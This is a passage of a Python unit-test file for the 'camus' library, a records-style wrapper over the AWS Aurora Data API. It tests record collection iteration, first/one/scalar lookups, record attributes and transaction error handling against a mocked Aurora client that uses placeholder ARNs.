return {"transactionId": "transactionId"}
def commit_transaction(self, secretArn, resourceArn, transactionId):
raise Exception("commit_transaction_error")
def rollback_transaction(self, secretArn, resourceArn, transactionId):
pass
def execute_statement(self, secretArn, resourceArn, database, sql, includeResultMetadata, transactionId, parameters=None):
return {"numberOfRecordsUpdated": 0}
class TestRecordCollection:
def test_iter(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
for i, row in enumerate(rows):
check_id(i, row)
def test_next(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
for i in range(10):
check_id(i, next(rows))
def test_iter_and_next(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
i = enumerate(iter(rows))
check_id(*next(i)) # Cache first row.
next(rows) # Cache second row.
check_id(*next(i)) # Read second row from cache.
def test_multiple_iter(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
i = enumerate(iter(rows))
j = enumerate(iter(rows))
check_id(*next(i)) # Cache first row.
check_id(*next(j)) # Read first row from cache.
check_id(*next(j)) # Cache second row.
check_id(*next(i)) # Read second row from cache.
def test_slice_iter(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(10))
for i, row in enumerate(rows[:5]):
check_id(i, row)
for i, row in enumerate(rows):
check_id(i, row)
assert len(rows) == 10
# all
def test_all_returns_a_list_of_records(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(3))
assert rows.all() == [IdRecord(0), IdRecord(1), IdRecord(2)]
# first
def test_first_returns_a_single_record(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(1))
assert rows.first() == IdRecord(0)
def test_first_defaults_to_None(self):
rows = camus.RecordCollection(iter([]))
assert rows.first() is None
def test_first_default_is_overridable(self):
rows = camus.RecordCollection(iter([]))
assert rows.first("Cheese") == "Cheese"
def test_first_raises_default_if_its_an_exception_subclass(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.first, Cheese)
def test_first_raises_default_if_its_an_exception_instance(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.first, Cheese("cheddar"))
# one
def test_one_returns_a_single_record(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(1))
assert rows.one() == IdRecord(0)
def test_one_defaults_to_None(self):
rows = camus.RecordCollection(iter([]))
assert rows.one() is None
def test_one_default_is_overridable(self):
rows = camus.RecordCollection(iter([]))
assert rows.one("Cheese") == "Cheese"
def test_one_raises_when_more_than_one(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(3))
raises(ValueError, rows.one)
def test_one_raises_default_if_its_an_exception_subclass(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.one, Cheese)
def test_one_raises_default_if_its_an_exception_instance(self):
rows = camus.RecordCollection(iter([]))
class Cheese(Exception):
pass
raises(Cheese, rows.one, Cheese("cheddar"))
# scalar
def test_scalar_returns_a_single_record(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(1))
assert rows.scalar() == 0
def test_scalar_defaults_to_None(self):
rows = camus.RecordCollection(iter([]))
assert rows.scalar() is None
def test_scalar_default_is_overridable(self):
rows = camus.RecordCollection(iter([]))
assert rows.scalar("Kaffe") == "Kaffe"
def test_scalar_raises_when_more_than_one(self):
rows = camus.RecordCollection(IdRecord(i) for i in range(3))
raises(ValueError, rows.scalar)
class TestRecord:
def test_record_dir(self):
keys, values = ["id", "name", "email"], [1, "", ""]
record = camus.Record(keys, values)
_dir = dir(record)
for key in keys:
assert key in _dir
for key in dir(object):
assert key in _dir
def test_record_duplicate_column(self):
keys, values = ["id", "name", "email", "email"], [1, "", "", ""]
record = camus.Record(keys, values)
with raises(KeyError):
record["email"]
@mock.patch("camus.boto3")
class TestTransaction:
def test_raise(self, boto3):
payload = {
"secret_arn": 'arn:aws:secretsmanager:us-east-1:123456789012:secret:your-secret-name-ByH87J',
"resource_arn": 'arn:aws:rds:us-east-1:123456789012:cluster:your-cluster-name',
"dbname": 'testing'
}
aurora = MockAurora()
db = camus.Database(**payload, conn=aurora)
with raises(Exception, match="commit_transaction_error"):
with db.transaction() as txid:
db.query("SELECT * FROM teste")
|